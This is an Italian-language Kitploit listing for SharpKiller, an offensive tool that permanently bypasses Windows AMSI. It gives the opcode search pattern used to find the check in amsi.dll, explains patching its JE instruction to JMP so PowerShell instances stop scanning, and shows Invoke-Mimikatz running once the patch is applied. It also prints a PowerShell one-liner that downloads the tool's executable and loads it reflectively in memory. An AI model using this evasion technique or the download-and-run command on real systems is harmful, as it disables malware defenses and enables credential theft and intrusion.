Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/s1lkys/sharpkiller
Escalation di PrivilegiExploitEvasione IDS/IPSPost-ExploitRed TeamingSviluppo Payload
GitHubs1lkys/sharpkiller

SharpKiller

Bypass AMSI permanente di @ZeroMemoryEx portato su .NET Framework 4.8

Vedi Repository
351431 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SharpKiller

Bypass AMSI permanente: AMSI-Killer di @ZeroMemoryEx portato a .NET Framework 4.8.

È richiesto un ulteriore offuscamento

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/SharpKiller.A&ThreatID=2147895059

Funzionalità integrate di recente:

[ x ] - Scansione live dei nuovi processi PowerShell ogni 0.5 secondi -> applica automaticamente le patch alle nuove istanze di PowerShell

Compilazione della soluzione

  • Imposta esplicitamente la piattaforma su x64 in Build > configuration manager

Come funziona?

Scansione opcode

  • otteniamo l'indirizzo esatto dell'istruzione di salto cercando il primo byte di ogni istruzione; questa tecnica è efficace anche in caso di aggiornamenti o modifiche al set di dati target.

  • per esempio :

    | 48:85D2 | test rdx, rdx |

    | 74 3F | je amsi.7FFAE957C694 |

    | 48 : 85C9 | test rcx, rcx |

    | 74 3A | je amsi.7FFAE957C694 |

    | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |

    | 74 33 | je amsi.7FFAE957C694 |

  • il pattern di ricerca sarà simile a questo :

    { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}

    image

Patch

Prima della patch

  • Il programma confronta il valore di RDX con se stesso. Se il confronto restituisce 0, il programma esegue un salto per restituire il controllo. In caso contrario, il programma prosegue valutando l'istruzione successiva.

    image

  • non possiamo eseguire "Invoke-Mimikatz"

    image

Dopo la patch

  • modifichiamo il primo byte e lo cambiamo da JE a JMP, così restituisce direttamente il controllo.

    Screenshot 2023-02-26 195848

    image

  • ora possiamo eseguire "Invoke-Mimikatz"

Processi di nuova creazione

  • Sharp-Killer applicherà una patch a qualsiasi processo PowerShell di nuova creazione in tempo quasi reale.

Demo video

video

OneLiner per eseguire con reflection

root@kitploit:~
$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe"; $cli = New-Object System.Net.WebClient; $sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));$vars = New-Object System.Collections.Generic.List[System.Object];$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";$sk.EntryPoint.Invoke($null,@(,$passed));

Questo errore si verifica quando si utilizza il OneLiner menzionato?

Se hai mai visto questo messaggio e ti sei chiesto cosa fosse, benvenuto nell'interfaccia .NET AMSI! :-)

root@kitploit:~
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '288768 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."
  • https://s3cur3th1ssh1t.github.io/Powershell-and-the-.NET-AMSI-Interface/

Riferimenti:

  • https://github.com/ZeroMemoryEx/Amsi-Killer
Scarica lo strumento